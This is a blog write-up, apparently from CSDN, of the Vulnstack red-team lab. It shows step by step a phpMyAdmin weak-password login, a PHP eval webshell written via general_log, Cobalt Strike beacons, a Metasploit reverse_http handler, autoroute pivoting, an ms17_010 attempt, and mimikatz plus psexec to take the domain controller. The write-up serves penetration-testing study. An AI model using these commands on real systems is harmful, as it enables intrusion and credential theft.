Vulnstack红队(一)

刚开始了解内网的时候做的,可能细节有问题的地方会比较多

0 - 环境配置

  • Vmware虚拟网络配置

  • 三个靶机设置

    • Win7(添加一张网卡)
      • VMnet1
      • VMnet2
    • Win2003
      • VMnet1
    • Win2008
      • VMnet1
  • 攻击机(kali)设置

    • VMnet2
  • 网络拓扑

    • kali ---> Win7 ---> ( Win2003 & Win2008 )
  • 进入Win7 C:/phpStudy运行phpStudy并启动服务

    • 密码都是hongrisec@2019

1 - 外网渗透

1-1 发现主机

netdiscover -i eth0 -r 10.10.10.0/24 要等一小会儿(抓包)

1-2 端口探测

nmap -sV 10.10.10.129 (排除DHCP服务器之外可以都尝试一下)

1-3 资产发现

访问10.10.10.129,发现是个phpStudy探针页面

dirsearch扫了一下,发现有phpmyadmin

访问/phpinfo.php,通过搜索document_root获得web目录的绝对路径为C:/phpStudy/WWW

1-4 Getshell

访问/phpadmin,并通过root/root弱口令进入系统

发现secure_file_prive = NULL,就是说不能直接用into outfile写shell

用一般日志写shell,先修改参数

set global general_log = on; set global general_log_file = "C:/phpStudy/WWW/r3col.php";

执行一个sql查询select "<?php eval($_POST['s'])?>"; 然后用蚁剑连接

2 - 内网渗透

2-1 CS上线

Cobalt Strike下载地址 & 使用方法

开启teamserver

把CS文件夹copy到linux中,使用./teamserver linux主机ip password 运行teamserver

添加Listener

主菜单(导航栏)Cobalt Strike--->Listener--->Add--->Payload=Beacon HTTP 填上teamserver的IP即可

生成木马:

主菜单(导航栏)Cobalt Strike--->Attacks--->Packages--->Window Excutable---> 选择刚刚添加的teamserver对应的Listener--->点击Generate

把生成的木马上传到目标主机并运行:

右键上线的机器,interact进入beacon ,先使用sleep 1把sleep时间调整为1秒

CS与上线机器的交互过程是:CS Client ---> CS Server ---- sleep 60s ----> Target PC

默认时间为60s,比较慢,在打靶机的时候可以设置为0/1

2-2 提权 & hashdump

提权:

右键上线的主机--->Access--->Elevate--->选择teamserver对应的Listener--->点击Launch

hashdump:

2-2 探测网络信息

beacon中执行shell ipconfig

beacon的用法 shell CMD来执行系统命令

发现内网192.168.52.0/24 本机为143

shell systeminfo /all发现域god.org和登录服务器\\OWA

因为网络设置成NAT会从外网解析god.org域,所以这里把kali+win7(模拟外网)设置为主机模式,网段为192.168.72.0/24

net view(CS自带的命令,会自动探测IP)

shell net time /domain 一般来说,域内时间服务器就是域控

确认一下 shell net group "domain controllers" /domain

整理一下内网信息:

    • god.org
  • 域内机器
    • 上线机器(win7)
      • 192.168.52.143
    • 域控/域登录服务器
      • 192.168.52.138
      • owa.god.org
    • 另一个域内机器
      • 192.168.52.141

2-3 横向移动

2-3-1 建立SMB Beacon

SMB Beacon使用windows管道(pipe)进行通信,可以把以此为枢纽,进行内网 <---> 外网的流量转发

首先,新建一个Listenerpayload选择Beacon SMB

然后在要建立SMB Beacon的beacon对话框中输入spawn [Listener_Name]

(也可以选择对应的会话,右键-->Spawn--->选择新建的Listener

2-3-2 msf与cs联动

之后借助msf进行渗透,建立目标路由:kali ---> cs-server ---> win7 ---> 内网

运行msfconsole并加载监听模块

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
set lhost 192.168.72.129
set lport 8000
exploit

在CS中添加Listener,我没有找到如何创建foreign_reverse_tcp,(CS4.2)所以使用了foreign_reverse_http

选择system权限的win7会话,右键-->spawn--->选择刚刚新建的Listener

成功上线

2-3-3 配置静态路由
run get_local_subnets   #查看网段/子网
run autoroute -s 192.168.52.0/24   #添加路由
run autoroute -p  #查看路由
background   #转入后台运行

下图表明,子网为192.168.52.0/24的流量都会通过刚刚建立的Session 9(win7)来路由

2-3-4 对DC进行扫描
use auxiliary/scanner/portscan/tcp
set rhosts 192.168.52.138
set ports 80,135,139,3306,3389
run

发现445端口开启,可能存在ms17-010漏洞

use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp
set rhosts 192.168.52.138
run

试了很多次都没有成功

2-3-5 mimikatz

利用logonpasswords调用mimikatz,抓取到了可以登录域内机器的管理员账号,利用psexec建立连接:

Targets--->右键--->Jump--->psexec--->选择域管理员账号,并选择之前用来做smb转发的listener,session选择spawn出的机器

拿下域控

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
Goby红队版POC是一个专门为红队渗透测试设计的工具。红队渗透测试是指模拟攻击者的技术和策略来评估组织的网络安全防御能力,并识别潜在的漏洞和弱点。Goby红队版POC通过发现、测试和利用网络系统和应用程序中的漏洞,帮助安全团队更好地保护组织的网络。 Goby红队版POC的主要功能包括漏洞扫描、漏洞检测和漏洞利用。它可以扫描网络目标,查找可能存在的漏洞,并生成详细的报告。与传统的漏洞扫描工具不同,Goby红队版POC还具备漏洞检测的能力,可以通过发送特定的网络数据包来检测目标系统的漏洞。同时,它还提供了漏洞利用的功能,可以自动化地利用漏洞攻击目标系统,以验证漏洞的存在性,并帮助安全团队修补这些漏洞。 Goby红队版POC还具备一个直观的用户界面,使安全团队能够方便地管理和执行渗透测试任务。它提供了多种方式来配置和管理扫描任务,包括选择扫描目标、设置扫描选项、编写自定义POC等。同时,它还支持生成漏洞报告,以便安全团队更好地识别和修补漏洞。 总之,Goby红队版POC是一款功能强大的红队渗透测试工具,能够帮助安全团队发现和利用网络系统和应用程序中的漏洞,提高组织的网络安全防御能力。它的直观用户界面和丰富的功能使得安全团队能够更加高效地管理和执行渗透测试任务,并根据测试结果采取相应的修补措施。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

网络安全-生

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值